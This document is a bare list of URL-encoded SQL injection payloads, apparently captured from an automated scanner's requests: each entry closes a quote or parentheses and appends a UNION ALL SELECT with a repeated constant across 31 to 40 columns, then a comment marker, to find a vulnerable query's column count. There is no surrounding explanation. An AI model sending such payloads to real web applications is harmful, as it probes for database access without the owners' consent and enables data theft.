-1330%22%29%29%29%20UNION%20ALL%20SELECT%207867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867%2C7867--%20 -8161%22%20UNION%20ALL%20SELECT%204223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223%2C4223--%20 -3717%22%20UNION%20ALL%20SELECT%203944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944%2C3944--%20 -2118%22%20UNION%20ALL%20SELECT%204230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230%2C4230--%20 -5256%22%20UNION%20ALL%20SELECT%209477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477%2C9477--%20 -3019%22%20UNION%20ALL%20SELECT%202888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888%2C2888--%20 -3052%22%20UNION%20ALL%20SELECT%201414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414%2C1414--%20 -1570%22%20UNION%20ALL%20SELECT%204202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202%2C4202--%20 -8932%22%20UNION%20ALL%20SELECT%204129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129%2C4129--%20 -3888%22%20UNION%20ALL%20SELECT%206281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281%2C6281--%20 -2804%22%20UNION%20ALL%20SELECT%207255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255%2C7255--%20 -4364%22%29%20UNION%20ALL%20SELECT%205515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515--%20 -8902%22%29%20UNION%20ALL%20SELECT%208886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886%2C8886--%20 -2100%22%29%20UNION%20ALL%20SELECT%206427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427%2C6427--%20 -3789%22%29%20UNION%20ALL%20SELECT%206785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785%2C6785--%20 -1924%22%29%20UNION%20ALL%20SELECT%207463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463%2C7463--%20 -1181%22%29%20UNION%20ALL%20SELECT%202708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708%2C2708--%20 -5948%22%29%20UNION%20ALL%20SELECT%206128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128%2C6128--%20 -6794%22%29%20UNION%20ALL%20SELECT%206655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655%2C6655--%20 -5433%22%29%20UNION%20ALL%20SELECT%208641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641%2C8641--%20 -7715%22%29%20UNION%20ALL%20SELECT%204313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313%2C4313--%20 -8488%22%29%29%20UNION%20ALL%20SELECT%207736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736--%20 -2271%22%29%29%20UNION%20ALL%20SELECT%207427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427--%20 -9608%22%29%29%20UNION%20ALL%20SELECT%204134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134%2C4134--%20 -4612%22%29%29%20UNION%20ALL%20SELECT%206205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205%2C6205--%20 -3913%22%29%29%20UNION%20ALL%20SELECT%201554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554%2C1554--%20 -1851%22%29%29%20UNION%20ALL%20SELECT%209044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044--%20 -8056%22%29%29%20UNION%20ALL%20SELECT%208308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308%2C8308--%20 -3813%22%29%29%20UNION%20ALL%20SELECT%206542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542%2C6542--%20 -1198%22%29%29%20UNION%20ALL%20SELECT%207194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194--%20 -6249%22%29%29%20UNION%20ALL%20SELECT%205275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275--%20 -1983%22%29%29%29%20UNION%20ALL%20SELECT%205469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469--%20 -2676%22%29%29%29%20UNION%20ALL%20SELECT%205733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733%2C5733--%20 -8378%22%29%29%29%20UNION%20ALL%20SELECT%201134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134%2C1134--%20 -6007%22%29%29%29%20UNION%20ALL%20SELECT%205695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695--%20 -9851%22%29%29%29%20UNION%20ALL%20SELECT%203817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817--%20 -8083%22%29%29%29%20UNION%20ALL%20SELECT%205598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598%2C5598--%20 -9243%22%29%29%29%20UNION%20ALL%20SELECT%206648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648%2C6648--%20 -5461%22%29%29%29%20UNION%20ALL%20SELECT%206313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313%2C6313--%20 -6447%22%29%29%29%20UNION%20ALL%20SELECT%203157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157%2C3157--%20 -2046%22%29%29%29%20UNION%20ALL%20SELECT%203939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939%2C3939--%20 -3423%22%20UNION%20ALL%20SELECT%205515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515%2C5515--%20 -2067%22%20UNION%20ALL%20SELECT%204367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367--%20 -1353%22%20UNION%20ALL%20SELECT%209421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421%2C9421--%20 -7803%22%20UNION%20ALL%20SELECT%205068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068%2C5068--%20 -8949%22%20UNION%20ALL%20SELECT%205365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365%2C5365--%20 -5740%22%20UNION%20ALL%20SELECT%206693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693%2C6693--%20 -6588%22%20UNION%20ALL%20SELECT%203869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869%2C3869--%20 -6362%22%20UNION%20ALL%20SELECT%201782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782%2C1782--%20 -1868%22%20UNION%20ALL%20SELECT%205053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053%2C5053--%20 -4370%22%20UNION%20ALL%20SELECT%206762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762%2C6762--%20 -3380%25%27%29%20UNION%20ALL%20SELECT%202324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324%2C2324--%20 -9086%25%27%29%20UNION%20ALL%20SELECT%206227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227%2C6227--%20 -9166%25%27%29%20UNION%20ALL%20SELECT%204399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399%2C4399--%20 -8836%25%27%29%20UNION%20ALL%20SELECT%201587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587%2C1587--%20 -9040%25%27%29%20UNION%20ALL%20SELECT%204192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192%2C4192--%20 -3740%25%27%29%20UNION%20ALL%20SELECT%208258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258%2C8258--%20 -2543%25%27%29%20UNION%20ALL%20SELECT%206759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759%2C6759--%20 -5181%25%27%29%20UNION%20ALL%20SELECT%206319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319%2C6319--%20 -2177%25%27%29%20UNION%20ALL%20SELECT%208074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074%2C8074--%20 -6940%25%27%29%20UNION%20ALL%20SELECT%206292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292%2C6292--%20 -1023%25%27%29%29%20UNION%20ALL%20SELECT%207587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587%2C7587--%20 -9148%25%27%29%29%20UNION%20ALL%20SELECT%205540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540%2C5540--%20 -6429%25%27%29%29%20UNION%20ALL%20SELECT%201146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146%2C1146--%20 -4007%25%27%29%29%20UNION%20ALL%20SELECT%202197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197%2C2197--%20 -5433%25%27%29%29%20UNION%20ALL%20SELECT%209455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455%2C9455--%20 -2524%25%27%29%29%20UNION%20ALL%20SELECT%208356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356%2C8356--%20 -5256%25%27%29%29%20UNION%20ALL%20SELECT%201130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130%2C1130--%20 -9190%25%27%29%29%20UNION%20ALL%20SELECT%204066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066--%20 -9061%25%27%29%29%20UNION%20ALL%20SELECT%208329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329%2C8329--%20 -7769%25%27%29%29%20UNION%20ALL%20SELECT%204888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888--%20 -4938%25%27%29%29%29%20UNION%20ALL%20SELECT%208496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496%2C8496--%20 -3168%25%27%29%29%29%20UNION%20ALL%20SELECT%203592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592%2C3592--%20 